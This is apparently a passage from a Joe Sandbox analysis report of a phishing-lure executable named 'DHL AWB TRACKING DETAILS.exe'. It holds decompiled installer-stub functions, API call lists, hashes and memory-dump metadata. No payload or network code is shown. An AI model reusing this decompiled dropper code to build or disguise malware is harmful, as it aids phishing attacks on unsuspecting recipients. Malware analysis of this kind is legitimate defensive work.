                    						if(_a8 != 0x405) {
                    							goto L53;
                    						}
                    						goto L22;
                    					}
                    					_t117 = _a12 & 0x0000ffff;
                    					if(_t117 != 0x3fb) {
                    						L12:
                    						if(_t117 == 0x3e9) {
                    							_t148 = 7;
                    							memset( &_v72, 0, _t148 << 2);
                    							_v76 = _a4;
                    							_v68 = 0x420498;
                    							_v56 = E004045AA;
                    							_v52 = _t162;
                    							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
                    							_t122 =  &_v76;
                    							_v60 = 0x41;
                    							__imp__SHBrowseForFolderA(_t122);
                    							if(_t122 == 0) {
                    								_a8 = 0x40f;
                    							} else {
                    								__imp__CoTaskMemFree(_t122);
                    								E00405578(_t162);
                    								_t124 =  *0x423eb0; // 0x50f930
                    								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
                    								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\engineer\\AppData\\Local\\Temp") {
                    									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
                    									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
                    										lstrcatA(_t162, 0x422e40);
                    									}
                    								}
                    								 *0x420484 =  &(( *0x420484)[0]);
                    								SetDlgItemTextA(_a4, 0x3fb, _t162);
                    							}
                    						}
                    						goto L20;
                    					}
                    					if(_a12 >> 0x10 != 0x300) {
                    						goto L53;
                    					}
                    					_a8 = 0x40f;
                    					goto L12;
                    				} else {
                    					_t159 = _a4;
                    					_v12 = GetDlgItem(_t159, 0x3fb);
                    					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
                    						E00405578(_t162);
                    					}
                    					 *0x423678 = _t159;
                    					SetWindowTextA(_v12, _t162);
                    					_push( *((intOrPtr*)(_a16 + 0x34)));
                    					_push(1);
                    					E00403E37(_t159);
                    					_push( *((intOrPtr*)(_a16 + 0x30)));
                    					_push(0x14);
                    					E00403E37(_t159);
                    					E00403E6C(_v12);
                    					_t138 = E00405DA3(7);
                    					if(_t138 == 0) {
                    						L53:
                    						return E00403E9E(_a8, _a12, _a16);
                    					}
                    					 *_t138(_v12, 1);
                    					goto L8;
                    				}
                    			}

                    APIs
                    • GetDlgItem.USER32 ref: 004042C1
                    • SetWindowTextA.USER32(?,?), ref: 004042EE
                    • SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
                    • CoTaskMemFree.OLE32(00000000), ref: 004043AE
                    • lstrcmpiA.KERNEL32(gdsanv,00420498,00000000,?,?), ref: 004043E0
                    • lstrcatA.KERNEL32(?,gdsanv), ref: 004043EC
                    • SetDlgItemTextA.USER32 ref: 004043FC
                      • Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D
                      • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                      • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                      • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                      • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                    • GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
                    • SetDlgItemTextA.USER32 ref: 00404549
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                    • String ID: A$C:\Users\user\AppData\Local\Temp$gdsanv
                    • API String ID: 2246997448-3093529516
                    • Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                    • Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
                    • Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                    • Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 74%
                    			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                    				signed int _v8;
                    				struct _ITEMIDLIST* _v12;
                    				signed int _v16;
                    				signed char _v20;
                    				signed char _v24;
                    				signed int _v28;
                    				signed int _t36;
                    				CHAR* _t37;
                    				signed char _t39;
                    				signed int _t40;
                    				int _t41;
                    				char _t51;
                    				char _t52;
                    				char _t54;
                    				char _t56;
                    				void* _t64;
                    				signed int _t68;
                    				intOrPtr _t72;
                    				signed int _t73;
                    				signed char _t74;
                    				intOrPtr _t77;
                    				char _t81;
                    				void* _t83;
                    				CHAR* _t84;
                    				void* _t86;
                    				signed int _t93;
                    				signed int _t95;
                    				void* _t96;
                    
                    				_t86 = __esi;
                    				_t83 = __edi;
                    				_t64 = __ebx;
                    				_t36 = _a8;
                    				if(_t36 < 0) {
                    					_t77 =  *0x42367c; // 0x5169b1
                    					_t36 =  *(_t77 - 4 + _t36 * 4);
                    				}
                    				_t72 =  *0x423ed8; // 0x514f2c
                    				_t73 = _t72 + _t36;
                    				_t37 = 0x422e40;
                    				_push(_t64);
                    				_push(_t86);
                    				_push(_t83);
                    				_t84 = 0x422e40;
                    				if(_a4 - 0x422e40 < 0x800) {
                    					_t84 = _a4;
                    					_a4 = _a4 & 0x00000000;
                    				}
                    				while(1) {
                    					_t81 =  *_t73;
                    					if(_t81 == 0) {
                    						break;
                    					}
                    					__eflags = _t84 - _t37 - 0x400;
                    					if(_t84 - _t37 >= 0x400) {
                    						break;
                    					}
                    					_t73 = _t73 + 1;
                    					__eflags = _t81 - 0xfc;
                    					_a8 = _t73;
                    					if(__eflags <= 0) {
                    						if(__eflags != 0) {
                    							 *_t84 = _t81;
                    							_t84 =  &(_t84[1]);
                    							__eflags = _t84;
                    						} else {
                    							 *_t84 =  *_t73;
                    							_t84 =  &(_t84[1]);
                    							_t73 = _t73 + 1;
                    						}
                    						continue;
                    					}
                    					_t39 =  *(_t73 + 1);
                    					_t74 =  *_t73;
                    					_a8 = _a8 + 2;
                    					_v20 = _t39;
                    					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
                    					_t68 = _t74;
                    					_t40 = _t39 | 0x00000080;
                    					__eflags = _t81 - 0xfe;
                    					_v28 = _t68;
                    					_v24 = _t74 | 0x00000080;
                    					_v16 = _t40;
                    					if(_t81 != 0xfe) {
                    						__eflags = _t81 - 0xfd;
                    						if(_t81 != 0xfd) {
                    							__eflags = _t81 - 0xff;
                    							if(_t81 == 0xff) {
                    								__eflags = (_t40 | 0xffffffff) - _t93;
                    								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
                    							}
                    							L41:
                    							_t41 = lstrlenA(_t84);
                    							_t73 = _a8;
                    							_t84 =  &(_t84[_t41]);
                    							_t37 = 0x422e40;
                    							continue;
                    						}
                    						__eflags = _t93 - 0x1d;
                    						if(_t93 != 0x1d) {
                    							__eflags = (_t93 << 0xa) + 0x424000;
                    							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
                    						} else {
                    							E004059E3(_t84,  *0x423ea8);
                    						}
                    						__eflags = _t93 + 0xffffffeb - 7;
                    						if(_t93 + 0xffffffeb < 7) {
                    							L32:
                    							E00405CE3(_t84);
                    						}
                    						goto L41;
                    					}
                    					_t95 = 2;
                    					_t51 = GetVersion();
                    					__eflags = _t51;
                    					if(_t51 >= 0) {
                    						L12:
                    						_v8 = 1;
                    						L13:
                    						__eflags =  *0x423f24;
                    						if( *0x423f24 != 0) {
                    							_t95 = 4;
                    						}
                    						__eflags = _t68;
                    						if(_t68 >= 0) {
                    							__eflags = _t68 - 0x25;
                    							if(_t68 != 0x25) {
                    								__eflags = _t68 - 0x24;
                    								if(_t68 == 0x24) {
                    									GetWindowsDirectoryA(_t84, 0x400);
                    									_t95 = 0;
                    								}
                    								while(1) {
                    									__eflags = _t95;
                    									if(_t95 == 0) {
                    										goto L29;
                    									}
                    									_t52 =  *0x423ea4; // 0x74691340
                    									_t95 = _t95 - 1;
                    									__eflags = _t52;
                    									if(_t52 == 0) {
                    										L25:
                    										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
                    										__eflags = _t54;
                    										if(_t54 != 0) {
                    											L27:
                    											 *_t84 =  *_t84 & 0x00000000;
                    											__eflags =  *_t84;
                    											continue;
                    										}
                    										__imp__SHGetPathFromIDListA(_v12, _t84);
                    										__imp__CoTaskMemFree(_v12);
                    										__eflags = _t54;
                    										if(_t54 != 0) {
                    											goto L29;
                    										}
                    										goto L27;
                    									}
                    									__eflags = _v8;
                    									if(_v8 == 0) {
                    										goto L25;
                    									}
                    									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
                    									__eflags = _t56;
                    									if(_t56 == 0) {
                    										goto L29;
                    									}
                    									goto L25;
                    								}
                    								goto L29;
                    							}
                    							GetSystemDirectoryA(_t84, 0x400);
                    							goto L29;
                    						} else {
                    							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
                    							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
                    							__eflags =  *_t84;
                    							if( *_t84 != 0) {
                    								L30:
                    								__eflags = _v20 - 0x1a;
                    								if(_v20 == 0x1a) {
                    									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
                    								}
                    								goto L32;
                    							}
                    							E00405AA7(_t71, _t84, _t95, _t84, _v20);
                    							L29:
                    							__eflags =  *_t84;
                    							if( *_t84 == 0) {
                    								goto L32;
                    							}
                    							goto L30;
                    						}
                    					}
                    					__eflags = _t51 - 0x5a04;
                    					if(_t51 == 0x5a04) {
                    						goto L12;
                    					}
                    					__eflags = _v20 - 0x23;
                    					if(_v20 == 0x23) {
                    						goto L12;
                    					}
                    					__eflags = _v20 - 0x2e;
                    					if(_v20 == 0x2e) {
                    						goto L12;
                    					} else {
                    						_v8 = _v8 & 0x00000000;
                    						goto L13;
                    					}
                    				}
                    				 *_t84 =  *_t84 & 0x00000000;
                    				if(_a4 == 0) {
                    					return _t37;
                    				}
                    				return E00405A85(_a4, _t37);
                    			}

                    APIs
                    • GetVersion.KERNEL32(00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
                    • GetSystemDirectoryA.KERNEL32 ref: 00405BC6
                    • GetWindowsDirectoryA.KERNEL32(gdsanv,00000400), ref: 00405BD9
                    • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
                    • SHGetPathFromIDListA.SHELL32(00000000,gdsanv), ref: 00405C23
                    • CoTaskMemFree.OLE32(00000000), ref: 00405C2E
                    • lstrcatA.KERNEL32(gdsanv,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
                    • lstrlenA.KERNEL32(gdsanv,00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                    • String ID: ,OQ$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$gdsanv
                    • API String ID: 900638850-2961400793
                    • Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                    • Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
                    • Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                    • Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 74%
                    			E00402012() {
                    				void* _t44;
                    				intOrPtr* _t48;
                    				intOrPtr* _t50;
                    				intOrPtr* _t52;
                    				intOrPtr* _t54;
                    				signed int _t58;
                    				intOrPtr* _t59;
                    				intOrPtr* _t62;
                    				intOrPtr* _t64;
                    				intOrPtr* _t66;
                    				intOrPtr* _t69;
                    				intOrPtr* _t71;
                    				int _t75;
                    				signed int _t81;
                    				intOrPtr* _t88;
                    				void* _t95;
                    				void* _t96;
                    				void* _t100;
                    
                    				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
                    				_t96 = E004029E8(0xffffffdf);
                    				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
                    				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
                    				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
                    				if(E004055E5(_t96) == 0) {
                    					E004029E8(0x21);
                    				}
                    				_t44 = _t100 + 8;
                    				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
                    				if(_t44 < _t75) {
                    					L13:
                    					 *((intOrPtr*)(_t100 - 4)) = 1;
                    					_push(0xfffffff0);
                    				} else {
                    					_t48 =  *((intOrPtr*)(_t100 + 8));
                    					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
                    					if(_t95 >= _t75) {
                    						_t52 =  *((intOrPtr*)(_t100 + 8));
                    						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                    						_t54 =  *((intOrPtr*)(_t100 + 8));
                    						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\engineer\\AppData\\Local\\Temp");
                    						_t81 =  *(_t100 - 0x14);
                    						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                    						if(_t58 != 0) {
                    							_t88 =  *((intOrPtr*)(_t100 + 8));
                    							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                    							_t81 =  *(_t100 - 0x14);
                    						}
                    						_t59 =  *((intOrPtr*)(_t100 + 8));
                    						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                    						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                    							_t71 =  *((intOrPtr*)(_t100 + 8));
                    							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                    						}
                    						_t62 =  *((intOrPtr*)(_t100 + 8));
                    						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                    						_t64 =  *((intOrPtr*)(_t100 + 8));
                    						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                    						if(_t95 >= _t75) {
                    							_t95 = 0x80004005;
                    							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
                    								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                    								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
                    							}
                    						}
                    						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                    						 *((intOrPtr*)( *_t66 + 8))(_t66);
                    					}
                    					_t50 =  *((intOrPtr*)(_t100 + 8));
                    					 *((intOrPtr*)( *_t50 + 8))(_t50);
                    					if(_t95 >= _t75) {
                    						_push(0xfffffff4);
                    					} else {
                    						goto L13;
                    					}
                    				}
                    				E00401423();
                    				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
                    				return 0;
                    			}






















                    APIs
                    • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                    Strings
                    • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: ByteCharCreateInstanceMultiWide
                    • String ID: C:\Users\user\AppData\Local\Temp
                    • API String ID: 123533781-1104044542
                    • Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                    • Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
                    • Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                    • Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 39%
                    			E00402630(char __ebx, char* __edi, char* __esi) {
                    				void* _t19;
                    
                    				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
                    					E004059E3(__edi, _t6);
                    					_push(_t19 - 0x178);
                    					_push(__esi);
                    					E00405A85();
                    				} else {
                    					 *__edi = __ebx;
                    					 *__esi = __ebx;
                    					 *((intOrPtr*)(_t19 - 4)) = 1;
                    				}
                    				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
                    				return 0;
                    			}





                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID:
                    • API String ID: 1974802433-0
                    • Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                    • Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
                    • Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                    • Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.362270592.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2380000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 53854e059d31078de7f50ce34d8e3abcfc16b3f73438acd4eb36df432d077a21
                    • Instruction ID: 771fd6e1950363fa939ae63f9290fedcd4bd40b2c3fb95ba28a3c11efb02515f
                    • Opcode Fuzzy Hash: 53854e059d31078de7f50ce34d8e3abcfc16b3f73438acd4eb36df432d077a21
                    • Instruction Fuzzy Hash: 57F1F41485D2EDADDB06CBF945603FDBFB05E2A102F4845C6E0E5E6283C53A938EDB21
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.362270592.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2380000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                    • Instruction ID: 4a1a8568b93cd374ce645f34a7f13f01fd70c5fafd6bd14fc2d568dcb4f3f81d
                    • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                    • Instruction Fuzzy Hash: EA110C71A10214EFCB24EFA9C4888AEF7FDEF856947544065F805DB314E770DE44C660
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.362270592.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2380000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                    • Instruction ID: 58c037d4c4df75791df5cb5448cc1fe0a5e45ee477fe5de95258a124d7ac4ca9
                    • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                    • Instruction Fuzzy Hash: 12E09A357606089FCB18DBB8C881D65B3F8EB09320B004290F819CB3A0EB34EE04DA90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.362270592.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2380000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                    • Instruction ID: 1cea1d94a7a63c37b88b8a9bf5eaa3777ae6422a072778b267ab733fff9096b3
                    • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                    • Instruction Fuzzy Hash: 7AE08C3A3107108BC335EA59D980992F3EAFB882B0719486AF89ADB721C330FC04CE50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.362270592.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2380000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                    • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                    • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                    • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                    				struct HWND__* _v32;
                    				void* _v84;
                    				void* _v88;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t35;
                    				signed int _t37;
                    				signed int _t39;
                    				intOrPtr _t44;
                    				struct HWND__* _t49;
                    				signed int _t67;
                    				struct HWND__* _t73;
                    				signed int _t86;
                    				struct HWND__* _t91;
                    				signed int _t99;
                    				int _t103;
                    				signed int _t115;
                    				signed int _t116;
                    				int _t117;
                    				signed int _t122;
                    				struct HWND__* _t125;
                    				struct HWND__* _t126;
                    				int _t127;
                    				long _t130;
                    				int _t132;
                    				int _t133;
                    				void* _t134;
                    				void* _t142;
                    
                    				_t115 = _a8;
                    				if(_t115 == 0x110 || _t115 == 0x408) {
                    					_t35 = _a12;
                    					_t125 = _a4;
                    					__eflags = _t115 - 0x110;
                    					 *0x42047c = _t35;
                    					if(_t115 == 0x110) {
                    						 *0x423ea8 = _t125;
                    						 *0x420490 = GetDlgItem(_t125, 1);
                    						_t91 = GetDlgItem(_t125, 2);
                    						_push(0xffffffff);
                    						_push(0x1c);
                    						 *0x41f458 = _t91;
                    						E00403E37(_t125);
                    						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
                    						 *0x42366c = E0040140B(4);
                    						_t35 = 1;
                    						__eflags = 1;
                    						 *0x42047c = 1;
                    					}
                    					_t122 =  *0x4091bc; // 0xffffffff
                    					_t133 = 0;
                    					_t130 = (_t122 << 6) +  *0x423ec0;
                    					__eflags = _t122;
                    					if(_t122 < 0) {
                    						L34:
                    						E00403E83(0x40b);
                    						while(1) {
                    							_t37 =  *0x42047c;
                    							 *0x4091bc =  *0x4091bc + _t37;
                    							_t130 = _t130 + (_t37 << 6);
                    							_t39 =  *0x4091bc; // 0xffffffff
                    							__eflags = _t39 -  *0x423ec4; // 0x2
                    							if(__eflags == 0) {
                    								E0040140B(1);
                    							}
                    							__eflags =  *0x42366c - _t133; // 0x0
                    							if(__eflags != 0) {
                    								break;
                    							}
                    							_t44 =  *0x423ec4; // 0x2
                    							__eflags =  *0x4091bc - _t44; // 0xffffffff
                    							if(__eflags >= 0) {
                    								break;
                    							}
                    							_t116 =  *(_t130 + 0x14);
                    							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
                    							_push( *((intOrPtr*)(_t130 + 0x20)));
                    							_push(0xfffffc19);
                    							E00403E37(_t125);
                    							_push( *((intOrPtr*)(_t130 + 0x1c)));
                    							_push(0xfffffc1b);
                    							E00403E37(_t125);
                    							_push( *((intOrPtr*)(_t130 + 0x28)));
                    							_push(0xfffffc1a);
                    							E00403E37(_t125);
                    							_t49 = GetDlgItem(_t125, 3);
                    							__eflags =  *0x423f2c - _t133; // 0x0
                    							_v32 = _t49;
                    							if(__eflags != 0) {
                    								_t116 = _t116 & 0x0000fefd | 0x00000004;
                    								__eflags = _t116;
                    							}
                    							ShowWindow(_t49, _t116 & 0x00000008);
                    							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                    							E00403E59(_t116 & 0x00000002);
                    							_t117 = _t116 & 0x00000004;
                    							EnableWindow( *0x41f458, _t117);
                    							__eflags = _t117 - _t133;
                    							if(_t117 == _t133) {
                    								_push(1);
                    							} else {
                    								_push(_t133);
                    							}
                    							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
